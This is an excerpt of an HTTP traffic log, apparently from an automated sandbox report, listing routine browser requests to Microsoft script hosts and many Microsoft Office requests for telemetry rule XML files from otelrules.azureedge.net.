Source: global traffic HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
